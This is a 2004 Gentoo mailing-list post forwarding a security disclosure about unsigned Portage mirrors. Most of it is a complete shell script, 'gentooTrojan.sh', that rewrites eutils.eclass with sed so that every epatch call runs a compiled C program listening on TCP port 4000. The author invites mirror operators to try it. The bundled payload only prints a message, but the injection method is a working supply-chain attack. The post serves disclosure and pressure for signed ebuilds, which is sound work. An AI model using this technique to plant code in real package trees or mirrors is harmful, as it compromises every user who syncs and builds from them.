1 |
perhaps some motivation for portage devs.... |
2 |
|
3 |
|
4 |
|
5 |
-------- Original Message -------- |
6 |
Subject: [gentoo-security] Trojan for Gentoo, part 2 |
7 |
Date: Sat, 06 Nov 2004 21:16:11 +0100 |
8 |
From: Alexander Holler <holler@××××××××××.de> |
9 |
To: gentoo-security@l.g.o |
10 |
|
11 |
|
12 |
|
13 |
Hi, |
14 |
|
15 |
after 1.5 years (2 years after the bug could could found in bugzilla) it |
16 |
seems that one of the highest security risks is closed. At least I've |
17 |
seen something about signed ebuilds. (see |
18 |
http://marc.theaimsgroup.com/?l=gentoo-security&m=104816199500974&w=2 ). |
19 |
|
20 |
Time for the next part. I've already written a bug for that a year ago, |
21 |
but it was now closed a second time by "the ... gatekeeper". |
22 |
|
23 |
See bug #26110 |
24 |
|
25 |
Here's the next small script. If you are operating a gentoo mirror, or |
26 |
having access to one, feel free to play with it. |
27 |
|
28 |
If you are a user, the only practical way to ensure a minimum of |
29 |
security is to sync twice: |
30 |
(a) sync, |
31 |
(b) delete timestap, |
32 |
(c) sync with other mirror and |
33 |
(d) look if no files where different, otherwise restart with (a) |
34 |
|
35 |
----------------gentooTrojan.sh--------------------------- |
36 |
#!/bin/sh |
37 |
if [ ${#} -ne 1 ] ; then |
38 |
echo "This script puts a silly trojan into Gentoo's portage." |
39 |
echo "Usage: `basename ${0}` PathToPortage" |
40 |
exit 1 |
41 |
fi |
42 |
|
43 |
mv ${1}/eclass/eutils.eclass ${1}/eclass/eutils-without-trojan.eclass |
44 |
sed -e 's:^epatch().*{:epatch() {\newarn "Starting Trojan.\nTry it with |
45 |
telnet localhost 4000.\nKill it with killall |
46 |
GentooTrojan."\n${PORTDIR}/eclass/GentooTrojan \&\n:' |
47 |
<${1}/eclass/eutils-without-trojan.eclass >${1}/eclass/eutils.eclass |
48 |
cat >${1}/eclass/GentooTrojan.c << EOF |
49 |
#include <unistd.h> |
50 |
#include <sys/socket.h> |
51 |
#include <netinet/in.h> |
52 |
#include <string.h> |
53 |
|
54 |
int main(void) |
55 |
{ |
56 |
struct sockaddr_in serv; |
57 |
struct sockaddr_in cli; |
58 |
int sock; |
59 |
sock = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP); |
60 |
if (sock < 0) |
61 |
return 1; |
62 |
bzero((char *) &serv, sizeof(serv)); |
63 |
serv.sin_family = AF_INET; |
64 |
serv.sin_addr.s_addr = htonl(INADDR_ANY); |
65 |
serv.sin_port = htons(4000); |
66 |
if (bind(sock, (struct sockaddr *) &serv, sizeof(serv)) < 0) |
67 |
return 1; |
68 |
if (listen(sock, 5) < 0) |
69 |
return 1; |
70 |
while (1) { |
71 |
int scli; |
72 |
int slen; |
73 |
static char *str="Your are listing to the famous Gentoo trojan!\n"; |
74 |
slen = sizeof(cli); |
75 |
scli = accept(sock, (struct sockaddr *) &cli, |
76 |
(socklen_t *) &slen); |
77 |
write(scli, str, strlen(str)); |
78 |
close(scli); |
79 |
} |
80 |
} |
81 |
EOF |
82 |
|
83 |
gcc -o ${1}/eclass/GentooTrojan ${1}/eclass/GentooTrojan.c |
84 |
|
85 |
echo "Done. Portage successful infected with a trojan." |
86 |
echo "Just emerge an ebuild which uses epatch and do a" |
87 |
echo " telnet localhost 4000" |
88 |
echo "afterwards." |
89 |
------------------------------------------- |
90 |
|
91 |
Kind regards, |
92 |
|
93 |
Alexander Holler |
94 |
|
95 |
|
96 |
PS: Please don't reply to me, I don't read any Gentoo mailing lists |
97 |
anymore, in fact I even don't know why I'm writting this message, as I |
98 |
already have lost every interest in Gentoo some time ago. |
99 |
|
100 |
PPS: Sorry for that hard words, but that all reminds me on Microsoft. |
101 |
The "eclass-hell" is as bad as the "dll-hell" and some bugs are getting |
102 |
forgotten, ignored or fixed in the same time. |
103 |
|
104 |
PPPS: I really appreciate all the very good work on hardened gcc, |
105 |
selinux-profiles and so on, but for me, this all seems useless as long |
106 |
as the base is compromised that easy and the user has no practical way |
107 |
(e.g. hashs) to check what he gets on his machine with a 'sync'. |
108 |
|
109 |
-- |
110 |
gentoo-security@g.o mailing list |
111 |
|
112 |
|
113 |
|
114 |
|
115 |
-- |
116 |
gentoo-dev@g.o mailing list |